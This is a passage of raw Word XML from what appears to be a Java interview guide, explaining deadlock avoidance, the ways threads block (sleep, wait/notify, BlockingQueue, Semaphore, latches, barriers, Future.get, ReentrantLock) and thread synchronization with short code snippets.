          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) which are designed to avoid the complexity of manual lock management and reduce the risk of deadlocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627367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using these tools, you can simplify the thread synchronization model and avoid situations that may lead to deadlocks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0055A990"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C66FE71">
          <v:rect id="_x0000_i1838" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71569E8D"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230D6B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Deadlock is a serious issue in multithreading, but it can be avoided by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E6D0A2"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Ensuring a </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consistent lock order</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DECC31"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lock timeouts</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to prevent threads from waiting indefinitely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4C3883"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Detecting</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> deadlocks using the ThreadMXBean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A20C2B8"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higher-level concurrency utilities</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to simplify synchronization logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DAF17A" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="00CE4B95" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By following these practices, you can ensure that your Java application remains free from deadlocks and behaves efficiently in a multithreaded environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B226554" w14:textId="6A94318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9" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2099C3EE"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86" w:name="_Toc197867500"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the ways of blocking the threads in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="286"/>
    </w:p>
    <w:p w14:paraId="00FEC36E" w14:textId="1AAB39CD" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D"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Using Thread.sleep()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233FD8EB"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sleep() method causes the current thread to pause for a specified amount of time, without releasing the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63716445"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is blocked for the specified amount of time (in milliseconds or nanoseconds) and cannot perform any operations during this time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10208E0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F63A2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4022A5B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Block the thread for 2 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3B4CD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A00CB1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B7D425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F6815BF"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Using Object.wait()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17171522"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wait() method is used for thread synchronization. A thread can call wait() on an object to release the lock on that object and enter the </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>waiting</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B927D89"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remains blocked (waiting) until another thread calls notify() or notifyAll() on the same object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE6D5D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A6C10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5747B8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758D58D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wait(); // Block the thread until notified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A95678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60B0730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C3A22C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D55AFA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B3F3391"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3. Using Object.notify() / Object.notifyAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A9FC1F"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se methods are used to wake up a thread or multiple threads that are waiting on the same object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E39FED0"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Blocking Behavior:</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> These methods do not directly block threads, but they can release the waiting state of a thread that was previously blocked by wait().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F14B5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30E3A03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278661D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notify(); // Wake up one thread that is waiting on obj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6964DC6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D68776B"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4. Using BlockingQueue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBA247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BlockingQueue interface provides blocking operations for thread-safe data exchange. Methods like take() or put() block the thread until the operation can proceed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F15552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25DC327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lockingQueue&lt;Integer&gt; queue = new ArrayBlockingQueue&lt;&gt;(10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B896171" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="306BEDD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Put method blocks if the queue is full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3790170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put(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCFB9FD" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="151EE7F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ake method blocks if the queue is empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB5CC6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take();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226EF41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5. Using Semaphore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1597E9EF"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Semaphore is a synchronization aid that controls access to a shared resource through the use of permits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF630CA"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cquire() method blocks the thread until a permit is available. The release() method releases the permit and potentially unblocks a waiting thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BAB3B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6F8D308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emaphore semaphore = new Semaphore(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168C4620" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6AF66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87B401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acquire(); // Blocks until a permit is available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5632B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4E5064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12DA8A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5FACF67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097862F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release(); // Releases the permit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A78690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86120B5"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6. Using CountDownLatch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3130955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CountDownLatch allows one or more threads to wait until a set of operations being performed by other threads completes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDD554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thread until the latch count reaches zero.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591CC97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069200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ountDownLatch latch = new CountDownLatch(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFDE7C3" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76B0E10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hread will be blocked until latch count reaches zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB6BF4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atch.await();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD52E42"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7. Using CyclicBarrier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405C729E"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CyclicBarrier is used to make threads wait until a certain number of threads have reached a common barrier point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A5ECAB"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calling thread until all threads have arrived at the barrier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39752AB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EF4C37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yclicBarrier barrier = new CyclicBarrier(3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFA7D6C" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AAA7AF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read t1 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193D255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59CE1D8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barrier.await(); // Blocks the thread until all threads reach the barrier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534F69E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task after barrier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289DD28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 catch (InterruptedException | BrokenBarrierException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A24D3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7278744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1212482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265B63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1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730D07F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8. Using Future.get()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F88033"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Future.get() method blocks the calling thread until the computation represented by the Future is complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395B1824"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will wait until the task represented by the Future is completed and the result is available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BA015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8D1F51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ExecutorService executorService = Executors.newSingleThreadExecutor();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B3694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Future&lt;Integer&gt; future = executorService.submit(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DA123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some long-running task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FACBB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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A66C4C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43974209" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CCD1A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Blocks until the result is available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038DDC4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teger result = future.get();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7448206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9. Using Lock.lock() / ReentrantLock.lock()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E10DBE1"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lock() method of ReentrantLock is used for acquiring a lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CFF7F8"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A thread will block while trying to acquire a lock if another thread is already holding the lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4068A5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09A3345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entrantLock lock = new ReentrantLock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551BB097" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00A6755D" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="225279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ock.lock(); // Block the thread until the lock is available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510D26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093A2F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AE0693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4E319B1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lock.unlock(); // Always unlock the lock in the finally block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60173E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76CE7E6C" w14:textId="77777777" w:rsidR="00A6755D" w:rsidRPr="004E218C" w:rsidRDefault="00000000" w:rsidP="004E21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428D2">
          <v:rect id="_x0000_i1840" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD4E40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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043DB97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se are the main ways to block threads in Java. Each method has a different use case and serves a specific purpose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFFDB1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Thread.sleep()</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used for pausing the thread for a specified amount of time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48862182"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notify()</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used for thread synchronization in shared resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC04B9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Queu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Semaphor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CountDownLatch</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CyclicBarrier</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are high-level concurrency utilities for managing thread interaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5821F2F8"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Future.get()</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used for blocking until the result of a concurrent task is available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2972F6A0"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s</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as ReentrantLock can block a thread until it acquires a lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6C2C7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hoosing the appropriate mechanism depends on the concurrency problem you're trying to solve and the nature of thread interactions in your program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5037EB47" w14:textId="1B746056"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41" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="472A2B5D"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87" w:name="_Toc197867501"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is thread synchronization in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="287"/>
    </w:p>
    <w:p w14:paraId="6B9461A8" w14:textId="7D9A0F48" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF"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Why Synchronization is Needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C346A0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In a multi-threaded environment, if multiple threads access the same resource (like a variable, object, or database), it could lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>race conditions</w:t>
      </w:r>
      <w:r w:rsidRPr="00535C96">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This can cause data inconsistency, where the data being manipulated by one thread may not be correctly updated when another thread accesses it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D3B0F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For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113885D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074477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47E6E524" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FF17D6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Without synchronization, two threads may access and modify 'count' at the same time, leading to incorrect results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E64C4C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2ADD5FD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  // Not thread-safe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B3278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FF5CA0" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37913B0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599200F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13AD40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8E4C60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B8E61F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if two threads call increment() at the same time, it may result in incorrect values for count due to the race condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005250D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Types of Thread Synchronization in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F46D2B"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Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0D10B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Blocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C48367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Locks and ReentrantLock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095F6827"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Concurrent Collections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2B549F"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ynchronized Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155A10E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43DD87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33A5EB34" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F3CF68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Synchronized method ensures only one thread can access this method at a time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CB055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synchronized void increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6799BD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0FF8024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7D5A34" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BFA5E0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0EF4E9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649DD4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15DE68E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106BF52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is example, only one thread can call the increment() method at a time. If multiple threads call increment(), they will wait for the lock to be released by the currently executing thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A8EE0E"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Synchronized Blocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C13F7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6DF2A6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A6B301A" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D21182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19A79D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nchronized (this) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E44C1F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3ED2615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7EE534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7CFD957E" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="275D06A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6D4DC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1F0EB9C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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FAF46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07F8BE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the synchronized block ensures that only one thread can increment the count variable at a time. It also allows you to fine-tune the granularity of synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78261CDD"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Locks and ReentrantLock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692E3A3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Lock;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C44F7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ReentrantLock;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602A2FD2" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D797B1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873AEC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90482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Lock lock = new ReentrantLock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D18C8A7" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD6A4C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377B642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lock();  // Acquiring the lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BDA5B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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8B92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1E8338F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finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2C551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unlock();  // Releasing the lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC8F72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EBF261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624B7F6" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29B24B6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802C17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CC514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0FB9E2C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693D4AF3"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ReentrantLock provides more flexibility, such as the ability to try locking with tryLock() or using lockInterruptibly() to acquire a lock with interruption handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F712CA2"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finally block is important to ensure that the lock is always released, even if an exception occurs inside the critical section.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CA3351"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Concurrent Collections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1F9CF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Example using ConcurrentHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BA1A2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ConcurrentHashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458B53D7" w14:textId="77777777" w:rsidR="00090DFF" w:rsidRPr="00535C96" w:rsidRDefault="00090DFF" w:rsidP="00535C96">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D1C462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SharedData {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BB56D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ConcurrentHashMap&lt;String, Integer&gt; map = new ConcurrentHashMap&lt;&gt;();</w:t>
